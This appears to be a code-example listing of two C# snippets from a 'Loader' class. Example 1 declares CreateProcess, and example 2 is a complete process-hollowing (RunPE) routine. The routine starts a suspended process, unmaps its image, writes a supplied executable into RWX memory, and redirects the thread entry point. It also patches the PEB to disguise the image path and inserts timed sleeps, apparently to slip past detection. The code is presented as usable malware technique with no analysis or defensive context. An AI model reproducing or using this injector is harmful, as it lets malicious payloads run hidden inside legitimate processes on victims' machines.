Пример #1
0
 private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref Loader.STARTUP_INFORMATION startupInfo, ref Loader.PROCESS_INFORMATION processInformation);
Пример #2
0
        private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
        {
            int    num  = 0;
            string text = string.Format("\"{0}\"", path);

            Loader.STARTUP_INFORMATION targetProcessStartInfo = default(Loader.STARTUP_INFORMATION);
            Loader.PROCESS_INFORMATION targetProcessInfo      = default(Loader.PROCESS_INFORMATION);
            targetProcessStartInfo.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(Loader.STARTUP_INFORMATION)));
            bool result;

            try
            {
                if (!string.IsNullOrEmpty(cmd))
                {
                    text = text + " " + cmd;
                }
                if (!Loader.CreateProcess(path, text, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null, ref targetProcessStartInfo, ref targetProcessInfo))
                {
                    throw new Exception();
                }
                int   num2  = BitConverter.ToInt32(data, 60);
                int   num3  = BitConverter.ToInt32(data, num2 + 52);
                int[] array = new int[179];
                array[0] = 65538;
                if (IntPtr.Size == 4)
                {
                    // 32bit windows
                    if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    // windows 64 bit
                    if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                int num4 = array[41];
                int num5 = 0;
                if (!Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, ref num5, 4, ref num))
                {
                    throw new Exception();
                }
                if (num3 == num5)
                {
                    if (Loader.NtUnmapViewOfSection(targetProcessInfo.ProcessHandle, num5) != 0)
                    {
                        throw new Exception();
                    }
                }

                Loader.Sleep(5000);

                int  length     = BitConverter.ToInt32(data, num2 + 80);
                int  bufferSize = BitConverter.ToInt32(data, num2 + 84);
                bool flag       = false;
                int  num6       = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, num3, length, 12288, 64);
                if (!compatible && num6 == 0)
                {
                    flag = true;
                    num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, 0, length, 12288, 64);
                }
                if (num6 == 0)
                {
                    throw new Exception();
                }

                Loader.Sleep(5000);

                if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6, data, bufferSize, ref num))
                {
                    throw new Exception();
                }

                int   num7 = num2 + 248;
                short num8 = BitConverter.ToInt16(data, num2 + 6);
                for (int i = 0; i <= (int)(num8 - 1); i++)
                {
                    int num9      = BitConverter.ToInt32(data, num7 + 12);
                    int num10     = BitConverter.ToInt32(data, num7 + 16);
                    int srcOffset = BitConverter.ToInt32(data, num7 + 20);
                    if (num10 != 0)
                    {
                        byte[] array2 = new byte[num10];
                        Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
                        if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6 + num9, array2, array2.Length, ref num))
                        {
                            throw new Exception();
                        }
                    }
                    num7 += 40;
                }

                Loader.Sleep(10000);

                byte[] bytes = BitConverter.GetBytes(num6);
                if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, bytes, 4, ref num))
                {
                    throw new Exception();
                }
                int num11 = BitConverter.ToInt32(data, num2 + 40);
                if (flag)
                {
                    num6 = num3;
                }

                array[44] = num6 + num11;
                if (IntPtr.Size == 4)
                {
                    if (!Loader.SetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    if (!Loader.Wow64SetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }

                Loader.Sleep(5000);

                Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, 0x0, ref num5, 4, ref num);

                if (IntPtr.Size == 4)
                {
                    // 32bit windows
                    if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    // windows 64 bit
                    if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
                    {
                        throw new Exception();
                    }
                }

                Loader.Sleep(5000);

                // Patch the PEB
                PEB_Patch.Apply(targetProcessInfo.ThreadHandle, Assembly.GetEntryAssembly().Location);

                Loader.Sleep(5000);

                if (Loader.ResumeThread(targetProcessInfo.ThreadHandle) == -1)
                {
                    throw new Exception();
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.ToString());
                Process processById = Process.GetProcessById(Convert.ToInt32(targetProcessInfo.ProcessId));
                if (processById != null)
                {
                    processById.Kill();
                }
                result = false;
                return(result);
            }
            result = true;
            return(result);
        }